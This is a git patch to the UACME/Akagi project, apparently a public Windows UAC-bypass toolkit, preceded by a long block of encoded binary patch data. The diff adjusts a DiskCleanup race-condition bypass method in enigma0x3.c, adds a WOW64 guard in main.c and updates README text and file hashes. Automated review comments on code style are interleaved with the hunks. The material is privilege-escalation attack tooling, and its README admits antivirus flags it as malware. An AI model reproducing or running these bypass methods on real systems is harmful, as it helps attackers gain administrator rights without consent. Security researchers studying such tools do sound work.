z`w^T^7U6dW6iRnZ23AyxB+iSy*t-RX6Xj$8{&oD82xq&1{nA33#YZTv#JG;_8eb+4 zWU&)Q%0IAMCgjP-+4B?fk{-m`sA?KXBI9|*ymA4F9t?@bB(a#ng0P4rwy5wGc{=Mn zaa7k-7|eB^foriXZ?cgGscgl>Zery}>v71EZA%Pg#VdD{WrhHxxleWzYd z+*N`>(@r|i2j2_nkG;ZI?^vkkqpknIvZnQrXR(>n61*96Ld(2OA0`;-{ia~t_%fH= zk`)5(13>%4eo7)3!6GBW99aqwq+b&fj}9UU0gVO3GjJ>aXe*}eXV_{noU>X%!<)>Q zmXN?^->he=(35_Xo=a@h^eO2n2uv>47IE`*p4VdqrwQT!`6rP`0sUMYa{DSfF+J5= zg&SWJzLY8-5-|eASOhbuN$;?S_w{bHh4dINamYjLW5AwD1ae6EmPbfjK|dEvV`$9_ z+CL(oG!9|@>2DHX4k&N)%NZfhvZ|s-Y-bTzL)qL@bldCRfPtQ~a-v?T3NEo0Tf4;pJ&r?GwfE>M^Pz_})Nd98&H20umch)p> za#-tbEPIx%?dzNm_m|t*ZL^m4I@C=hrzc+3HrUsrKl`L|>PZvl6A&ip!^H~*b}7QN zPd$=%`f6~+&U1_pw93Vy1pHZ?znQj`ee^a(JE}X_*5YKjmc3IvO3r62PqQEf-i2OJ2PcY^7!R2?yk*-v)IblP?pjw?T_&DC-SQD zkZsmMvEvxZXwKS7uucrJ;==`HN9Cbj*q=(7e@;R7Pr>J_Ta~D4Q@_UC?t)hX^rHtu zF?D4>&B=*NnMwln7!rkS1SS+w24_&XT6JNQZprL_4M$4js4EN;(X#F=41z%c15IX! 
z?tKumbm1EaFgU)tbGXc@$ylBPR>`ReXz z<*aK;<8Mr9-&T4D2fKvWZ{@2IE}e#w$%^OoslIPs7dh%gA>!icfysA>Jw3lOKFrk2 zcggFjugp)Av6ZAQ95-p(LxwR*+fZ@$a=ao8|G@aB4g_5c>+zhz6SYE;taxmA9C(fb zD?zyoPc!Iplq#N0c=qD?clFVQljX3;g6g=%fiQgDesRe{`OoU;+kTW;oos!rG{>G4 z`jw^`?!{tcSM9{J2^C%!zu;_N{q$`EMbYI2eOX8dxkziCEl;zPEb+mih9H zroYPI-b%QI$5B0a+kj5qc&tH=UARS}Y;QwYL0eJIPCySpm!MpP-E9@ueUKz|*^T>9DTp;`P>2R9 zccn{GHt6S2_IF8AF=z+MS4Kby=)EYP&y}PtpkG4y?Py7Q9rQ(%>0=Oj&>1L)6-d$- zps6fC)-{7JMENG3i09xq%Dbm}(OXouOa*|)Mhz%4r{Ss#dKk*pc+x4J8kToj~BQ96q-?%+v7nLY#21f7BMshQ{u=p9}Vug($;ucK^(!K*?; z1jjNp*yy{BW)$eGK|I${F*q_ku1)S-$|`eIDUOIcSk2bpoA+@=H8@ zL4S?%?!~}BuR?hRk5@(IDhT%yNtyyW2W9kaND#k!4yhybPn{_C>7-D zRnQKUQ}9SHAWA4#;fVlUjuSK{uiV_InDq8 diff --git a/README.md b/README.md index 403fec7..8d7136d 100644 --- a/README.md +++ b/README.md @@ -60,7 +60,7 @@ Run examples: * This tool is not intended for AV tests and not tested to work in aggressive AV environment, if you still plan to use it with installed bloatware AV soft - you use it at your own risk; * Some AV may flag this tool as HackTool, MSE/WinDefender constantly marks it as malware, nope; * If you run this program on real computer remember to remove all program leftovers after usage, for more info about files it drops to system folders see source code; -* Since 2.4 all added methods/code will be strictly x64. I don't see any sense in supporting 32 bit versions of Windows in 2016 year. +* Since 2.4 all added methods/code will be strictly x64. I don't see any sense in supporting 32 bit versions of Windows. # Microsoft countermeasures Methods fixed: 
@@ -103,8 +103,8 @@ https://blogs.msdn.microsoft.com/oldnewthing/20160816-00/?p=94105 # VirusTotal reference report -* Akagi32 https://www.virustotal.com/en/file/8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b/analysis/ -* Akagi64 https://www.virustotal.com/en/file/5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333/analysis/ +* Akagi32 https://www.virustotal.com/en/file/bc76b81567cdf3ead8e57164d466212849c4965fa6fa832ed10e5bb571e8d58b/analysis/ +* Akagi64 https://www.virustotal.com/en/file/6eb88048b0b9a0e195a8cfe4b9832761f76cab238f6bf62c5c6ac3a3c27fcf3c/analysis/ # Build diff --git a/Source/Akagi/enigma0x3.c b/Source/Akagi/enigma0x3.c index e41ffb8..9f4a92a 100644 --- a/Source/Akagi/enigma0x3.c +++ b/Source/Akagi/enigma0x3.c @@ -164,11 +164,13 @@ DWORD ucmDiskCleanupWorkerThread( do { status = NtNotifyChangeDirectoryFile(hDirectory, hEvent, NULL, NULL, - &IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_DIR_NAME | FILE_NOTIFY_CHANGE_FILE_NAME, TRUE); + &IoStatusBlock, Buffer, (ULONG)sz, FILE_NOTIFY_CHANGE_FILE_NAME, TRUE); if (status == STATUS_PENDING) NtWaitForSingleObject(hEvent, TRUE, NULL); + NtSetEvent(hEvent, NULL); + pInfo = (FILE_NOTIFY_INFORMATION*)Buffer; for (;;) { @@ -204,8 +206,6 @@ DWORD ucmDiskCleanupWorkerThread( pInfo = (FILE_NOTIFY_INFORMATION*)(((LPBYTE)pInfo) + pInfo->NextEntryOffset); if (pInfo->NextEntryOffset == 0) break; - - NtSetEvent(hEvent, NULL); } } while (NT_SUCCESS(status)); diff --git a/Source/Akagi/main.c b/Source/Akagi/main.c index cf985ac..8c2fddf 100644 --- a/Source/Akagi/main.c +++ b/Source/Akagi/main.c @@ -532,6 +532,11 @@ UINT ucmMain() return ERROR_UNSUPPORTED_TYPE; } #endif + //ban usage under wow64 (dismhost is x64 and x64 dlls are not present in 32bit version of this tool). + if (g_ctx.IsWow64) { + ucmShowMessage(WOW64STRING); + return ERROR_UNSUPPORTED_TYPE; + } break; } 
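Review bot: The relocated `NtSetEvent(hEvent, NULL);` in ucmDiskCleanupWorkerThread has no comment saying why the code signals an event that was already handed to the notification call, and the later hunk at -204 removes the old per-entry call without explanation either. As written it now runs once per pass of the `do` loop, after the optional wait and before `pInfo` is pointed at `Buffer`, whatever `status` holds. A one-line comment such as `/* signal hEvent once per notification batch, not once per parsed entry */` would record the intent. Dropping `FILE_NOTIFY_CHANGE_DIR_NAME` from the filter deserves the same treatment, a word on why directory-name changes are no longer watched. The loop body continues outside both hunks.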
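Review bot: The new WOW64 guard returns `ERROR_UNSUPPORTED_TYPE`, the same code as the branch that ends just above `#endif`, so a caller of ucmMain cannot tell the two refusals apart from the return value; only the `WOW64STRING` message differs. The comment would also read better as a full sentence, e.g. `// Refuse to run under WOW64: dismhost is x64 and the 32-bit build carries no x64 DLLs.` The `case` label this guard belongs to and the opening of the conditional block are outside the hunk, so whether the two checks overlap cannot be judged from here.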
@@ -547,8 +552,7 @@ UINT ucmMain()
 {
 supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
 }
- }
-
+ }
 //check environment and execute method if it met requirements
 switch (g_ctx.Method) {
diff --git a/UACME.sha256 b/UACME.sha256
index 4244c48..7a4fac2 100644
--- a/UACME.sha256
+++ b/UACME.sha256
@@ -1,5 +1,5 @@
-8100847e1066b04615a7ab2c2b919b70d75e96d1900b2f7a03896579f5f1982b *Compiled\Akagi32.exe
-5e453253add4e1b2a0a63c3a2ea2a45631f99e45d2e1dce96159766a30c73333 *Compiled\Akagi64.exe
+bc76b81567cdf3ead8e57164d466212849c4965fa6fa832ed10e5bb571e8d58b *Compiled\Akagi32.exe
+6eb88048b0b9a0e195a8cfe4b9832761f76cab238f6bf62c5c6ac3a3c27fcf3c *Compiled\Akagi64.exe
 098e6b9ca3c24b8d3dc8c2eb1a8ed8a07ca7248de1395e0ab4b515ff55a6eae4 *Source\uacme.sln
 8172069709954a5616b75306e565cbc5cd5baada00c15cba084420e61bebcdaf *Source\Akagi\akagi.ico
 02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02 *Source\Akagi\akagi.manifest
@@ -15,14 +15,14 @@ ba15ec03e68f87b0e1b86ff826b1b42886aac497d0bc7aca8753e5d3ffdb1693 *Source\Akagi\c
 fce0f9f17b98675ea322c9f1729c73c56467fbb68335e86417517e6fd549f630 *Source\Akagi\compress.c
 be3ecc4805c0c88ef53364c54448b13d19ddd1a31562602dbdca2457237a9e81 *Source\Akagi\compress.h
 6371bbc89d908cef5ee47fc436227cfa8f7d2dd026436832fb23fcde6eb18a17 *Source\Akagi\consts.h
-bb21e48947918f6c73659f2987fbb59740e341beee1266973bb12786eefa6b16 *Source\Akagi\enigma0x3.c
+e8d614e8bb275daebfe3e6407c1dd4e2be1541113ebac04e7fe0ee8dba227544 *Source\Akagi\enigma0x3.c
 362c2c8c0aeb6ed6396fffb1d06f5b83ac03b74c75845da0cab4702311863520 *Source\Akagi\enigma0x3.h
 069d647a1453a78d20c8ae7f0d0b45554a0df26bdb4b4df3ba6ec964cc0b5df3 *Source\Akagi\global.h
 5d17ed805de8f280c2430e3deb20acd4fa1dc8e43560773186707974cbf3a9eb *Source\Akagi\gootkit.c
 c37113f14c181533280441de1199cc511c7b35a42ceea3b9c0e671da7140d6fa *Source\Akagi\gootkit.h
 8761ed178e2a91e89bc1421a903f82f10364bbb598fa519178a4f324b6b97f65 *Source\Akagi\hybrids.c
 81f2108849fb85fbd2e8ee6b2ea35fe383446bdd218d3ed628c75f17352afabd *Source\Akagi\hybrids.h
-4999f2124a97ddd4bd4535a4bf8367b38c381c8452b7bb51a7465eb7ce676697 *Source\Akagi\main.c
+5859f19397408a1eef01c0a2debee43b0f0906064b7cc40c7bc0761691259d90 *Source\Akagi\main.c
 dab08cd614d03456a3310ca1e6d7718028d45fedd88c2b516f67d2655238e0d0 *Source\Akagi\makecab.c
 67a5f4f8d7aee49d7c1e029ddf50520d56f6081917a2cc2904764336857382a0 *Source\Akagi\makecab.h
 d2e73e697dc427dadf0902fa3b18a71dbb1e482ab57daf9c1bb4051bff717fba *Source\Akagi\manifest.h